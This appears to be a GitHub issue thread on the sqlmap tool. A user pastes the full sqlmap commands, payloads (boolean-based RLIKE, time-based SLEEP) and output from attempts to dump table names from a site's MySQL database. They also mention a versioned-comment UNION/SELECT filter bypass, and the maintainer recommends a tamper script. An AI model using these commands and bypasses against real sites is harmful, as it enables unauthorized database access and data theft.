cannot retrieve the table names

[semprul57]

Hi, i want to ask this issue, i cant get the tables name from this database. before i run this , i already update the sqlmap to the latest version.

root@backbox:~$ sqlmap -u http://site.com/this.php?id=587 -p id --tables -D livewire

[!] Warning: This tool is located in /opt/backbox/sqlmap [i] Remember to give the full absolute path when specifying a file

sqlmap/1.0-dev-5b2ded0 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:33:15

[06:33:15] [INFO] resuming back-end DBMS 'mysql' [06:33:18] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET Parameter: id Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: id=587 RLIKE (SELECT (CASE WHEN (5906=5906) THEN 587 ELSE 0x28 END))

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=587 AND SLEEP(5)

---

[06:33:25] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2000 web application technology: PHP 5.2.8, Microsoft IIS 5.0 back-end DBMS: MySQL 5 [06:33:25] [INFO] fetching tables for database: 'livewire' [06:33:25] [INFO] fetching number of tables for database 'livewire' [06:33:25] [INFO] retrieved: [06:33:30] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [06:33:30] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [06:34:26] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [06:34:28] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[06:34:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [06:34:31] [WARNING] unable to retrieve the number of tables for database 'livewire' [06:34:31] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] n No tables found [06:34:33] [WARNING] HTTP error codes detected during run: 403 (Forbidden) - 6 times [06:34:33] [INFO] fetched data logged to text files under '/opt/backbox/sqlmap/output/site.com'

there is no different when i add --hex or --no-cast i also try to check waf but there is no waf.

when i try SQL injection manually, i must using /!UNION//*!SELECT!/ to this step. i don't know what i must supposed to get the table name
please help

Thank You

[stamparm]

You should find appropriate tamper script and rerun with --tamper ... --flush-session

[stamparm]

e.g. for your case --tamper=versionedkeywords

[semprul57]

after i add --tamper=versionedkeywords and --flush-session i got another error for providing --regexp and increasing --level/--risk

and the result is :

root@backbox:~$ sqlmap -u http://site.com/this.php?id=587 -p id --tables -D livewire --hex --tamper=versionedkeywords --flush-session --regexp --level=5 --risk=3

[!] Warning: This tool is located in /opt/backbox/sqlmap [i] Remember to give the full absolute path when specifying a file

sqlmap/1.0-dev-5b2ded0 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:40:53

[02:40:53] [INFO] loading tamper script 'versionedkeywords' [02:40:53] [WARNING] tamper script 'versionedkeywords' is only meant to be run against MySQL [02:41:24] [INFO] testing connection to the target URL [02:41:30] [INFO] testing if the provided regular expression matches within the target URL page content [02:41:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [02:41:38] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y do you want to include all tests for 'MySQL' extending provided level (5) and risk (3)? [Y/n] y [02:42:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [02:45:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)' [02:47:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [02:47:19] [WARNING] reflective value(s) found and filtering out [02:47:19] [WARNING] frames detected containing attacked parameter values. Please be sure to test those separately in case that attack on this page fails [02:49:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' [02:50:47] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)' [02:50:50] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' [02:50:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)' [02:51:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [02:53:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' [02:55:31] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' [02:58:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' [02:58:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)' [02:58:45] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_int - original value)' [02:58:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [02:59:03] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)' [02:59:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' [02:59:15] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' [02:59:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [03:00:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)' [03:02:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)' [03:03:19] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' [03:04:24] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' [03:05:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)' [03:06:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)' [03:07:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause' [03:08:32] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [03:09:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [03:09:34] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [03:09:36] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [03:09:37] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' [03:09:41] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)' [03:09:44] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)' [03:09:47] [INFO] testing 'MySQL inline queries' [03:09:49] [INFO] testing 'MySQL > 5.0.11 stacked queries' [03:09:49] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [03:11:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [03:12:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [03:13:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)' [03:14:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)' [03:15:38] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' [03:16:50] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' [03:17:51] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)' [03:18:51] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace' [03:18:53] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)' [03:18:54] [INFO] testing 'MySQL time-based blind - Parameter replace (bool_int)' [03:19:57] [INFO] GET parameter 'id' is 'MySQL time-based blind - Parameter replace (bool*int)' injectable [03:19:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [03:19:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [03:20:34] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns' [03:21:17] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns' [03:21:52] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns' [03:22:24] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns' [03:23:03] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns' [03:23:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns' [03:24:13] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns' [03:24:44] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns' [03:25:37] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns' [03:26:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [03:26:51] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns' [03:27:29] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns' [03:28:04] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns' [03:28:38] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns' [03:29:14] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns' [03:29:44] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns' [03:30:19] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns' [03:30:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns' [03:31:28] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns' [03:32:05] [INFO] checking if the injection point on GET parameter 'id' is a false positive [03:33:51] [WARNING] false positive or unexploitable injection point detected [03:33:51] [WARNING] GET parameter 'id' is not injectable [03:33:51] [CRITICAL] all tested parameters appear to be not injectable. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing a valid value for option '--regexp' as perhaps the regular expression that you have chosen does not match exclusively True responses [03:33:51] [WARNING] HTTP error codes detected during run: 403 (Forbidden) - 1638 times

[*] shutting down at 03:33:51

i don't know the valid --regexp value and if there is there another code to add, please tell me

Thank You

[stamparm]

I would say that you'll need to exploit this target manually

[semprul57]

i've tried and the SQLMap succeeded to retrieve only 1 letter and then the sqlmap stopped. any solution?

and if there's no solution, what keyword i must search in google for this case? sorry bad english.

Thank You

[stamparm]

You have 403 (Forbidden) - 1638 times. Really can't help you here.

[semprul57]

alright, thank you for your help.

1 question, what keyword i must search on google to do this manually? so i can learn and implement to my website.

Thank You